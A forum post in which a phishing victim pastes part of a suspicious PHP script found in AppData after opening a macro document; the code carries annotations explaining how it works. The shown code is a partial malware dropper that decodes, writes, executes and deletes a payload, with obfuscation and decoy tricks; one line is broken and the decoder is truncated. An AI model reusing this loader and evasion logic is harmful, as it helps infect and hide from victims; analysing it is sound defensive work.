I foolishly clicked a link in an email from what I thought was UPS (with a tracking number); the link led to a .doc file with macros. After that I noticed a PHP popup in the lower task bar on every system startup. I then went to my local AppData\Roaming and found a suspicious folder containing a php.exe, a DLL and a PHP script. I opened the PHP file in Notepad++ to have a look. I have very little experience with PHP, so I can't really tell what the script is doing. Here is a copy/paste -- I removed a little less than half the code just in case I am actually posting malicious code to this forum.
If I had to guess, I'd say it looks like it's doing some kind of encryption or decoding, so maybe it's ransomware -- but I'm really not sure.
Script:
<?php
// Call table used by the rest of the script.  Every entry is an ordinary PHP
// function name that the original spelled as concatenated fragments
// ('cu' . 'rl_multi_exec', 'm' . 'ss' . 'ql_re' . 's' . 'ult', ...) so that a
// plain string search for e.g. "exec" or "file_put_contents" finds nothing.
// The resolved names are written out here; the indices are unchanged because
// the script addresses the functions as $GLOBALS['38744245'][N].
//
// In the part of the script that was pasted, only indices 2-5 (read the
// encoded payload, write the decoded file, run it, delete it) sit on a path
// that executes; 0, 1, 7 and 8 are only called inside always-false loops or
// branches, and 6 feeds one of those always-false conditions.
$GLOBALS['38744245'] = [
    'curl_multi_exec',        // 0  decoy (dead loop)
    'mssql_result',           // 1  decoy (dead loop)
    'file_get_contents',      // 2  read the encoded payload from disk
    'file_put_contents',      // 3  write the decoded payload back out
    'exec',                   // 4  run the written file
    'unlink',                 // 5  delete the written file afterwards
    'strpos',                 // 6  used in an always-false decoy check
    'fgetcsv',                // 7  decoy (dead branch)
    'strnatcmp',              // 8  decoy (dead loop)
    'strlen',                 // 9
    'mt_rand',                // 10
    'preg_replace_callback',  // 11
    'chr',                    // 12
    'ord',                    // 13
    'strpos',                 // 14
    'array_filter',           // 15
    'session_is_registered',  // 16
    'strpos',                 // 17
    'create_function',        // 18
    'imagecreatefromgd2part', // 19
    'mt_rand',                // 20
];
?><?php
/**
 * Obfuscated string table: returns entry $taqqmn of a fixed list of constants.
 *
 * Entries 0 and 1 are binary blobs -- entry 1 is entry 0 with four more bytes
 * appended -- which the top-level code runs through the decoder gnnnesr() and
 * then uses as the file paths it reads from and writes to.  Entries 3 and 4
 * are only used in an always-false strpos() decoy inside tpugtze(); entry 5
 * (the empty string) initialises a local in gnnnesr(); entry 2 is assigned but
 * never used in the pasted part; entries 6 and 7 are not referenced in the
 * pasted part at all.  All byte values are reproduced exactly.
 *
 * @param int $taqqmn index into the table
 * @return string|null the entry, or null (plus an undefined-index warning)
 *                     for an index outside 0..7
 */
function _1369297363($taqqmn)
{
    $head = "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e";
    $table = [
        $head,
        $head . "\x9c\x9a\x53\x21",
        'i',
        'bxhndsxsexibrxben',
        'gdz',
        '',
        'lxdgilfgvccek',
        'vz',
    ];
    return $table[$taqqmn];
}
?><?php
// --- Top-level logic (runs whenever php.exe is pointed at this script) ---
// Read together, the live statements below are a staged loader: an encoded
// file on disk is read, decoded in memory, written out as a new file, run,
// and then deleted.  Nothing in the pasted part touches or encrypts user
// files, so the "ransomware" guess is neither confirmed nor ruled out here;
// the removed half of the script could do anything.
//
// NOTE(review): this line is garbled in the paste -- round( is never closed
// and the last term is "101392739." -- so the script as posted does not
// parse.  Whatever the original value was, it is the constant handed to the
// decoder gnnnesr() as its second argument (its decode key/parameter).
$ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.;
// Opaque predicate: 3693 - round(923.25 * 4) == 0, so this loop never runs and
// the curl_multi_exec() call on undefined variables is a decoy.
while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25))
$GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm);
// Two encoded blobs from the string table (entry 1 is entry 0 plus 4 bytes).
$ovehlgp = _1369297363(0);
$czdwupq = _1369297363(1);
// Opaque predicate: round(369.33.. * 3) and round(221.6 * 5) are both 1108,
// so the mssql_result() decoy inside this loop never runs either.
while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6))
$GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf);
// Decode both blobs with gnnnesr() (defined further down; truncated in this
// paste).  From how they are used next, they decode to two file paths.
$ovehlgp = gnnnesr($ovehlgp, $ucdxetr);
$czdwupq = gnnnesr($czdwupq, $ucdxetr);
// file_get_contents(): read the encoded payload from the first path.
$yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp);
// Truthiness check: a missing, empty or "0" file skips the whole drop.
if ($yxfgkhr) {
// Decode the payload with the same key ...
$ghktwqf = gnnnesr($yxfgkhr, $ucdxetr);
// ... file_put_contents() it to the second path ...
$GLOBALS['38744245'][3]($czdwupq, $ghktwqf);
// ... exec() that path, i.e. run the freshly written file as a command ...
$GLOBALS['38744245'][4]($czdwupq);
// ... then unlink() it, retrying once per second until the delete succeeds
// (presumably once the started process no longer holds the file open).
while (!$GLOBALS['38744245'][5]($czdwupq))
Sleep(round(0 + 1));
// 'i' from the string table; not used anywhere in the pasted part.
$ptdybmu = _1369297363(2);
}
/**
 * 32-bit rotate-left helper used by the decoder gnnnesr(): rotates $acdfplp
 * left by ($gsseqei mod 32) bits.  The bits that fall off the top are brought
 * back in at the bottom via the masked right shift; the left-shifted part is
 * NOT masked to 32 bits, so on 64-bit PHP the result can exceed 0xFFFFFFFF
 * and the caller is presumably expected to mask it (gnnnesr() is truncated in
 * this paste, so that cannot be confirmed here).
 *
 * The original spelled every constant as round(0 + 7.75 + 7.75 + ...) (31),
 * round(0 + 10.66.. * 3) (32) and round(0 + 0.2 * 5) (1), and wrapped an
 * fgetcsv() call on undefined variables in
 * strpos('bxhndsxsexibrxben', 'gdz') !== false -- a condition that is always
 * false with this script's string table and has no side effects.  The dead
 * decoy is omitted here; the arithmetic is unchanged.
 *
 * @param int $acdfplp value to rotate (treated as a 32-bit word)
 * @param int $gsseqei rotate amount; only its low 5 bits are used
 * @return int rotated value
 */
function tpugtze($acdfplp, $gsseqei)
{
    $shift = $gsseqei & 31;
    // bits that wrapped around from the top, masked to the low $shift bits
    $wrapped = ($acdfplp >> (32 - $shift)) & ((1 << $shift) - 1);
    return ($acdfplp << $shift) | $wrapped;
}
function gnnnesr($rgyctvo, $ucdxetr)
{
$qaptxjz = _1369297363(5);
while (round(0 + 3667) - round(0 + 3667))
$GLOBALS['38744245'][8]($yxfgkhr);
[END PORTION OF CODE REMOVED]
?>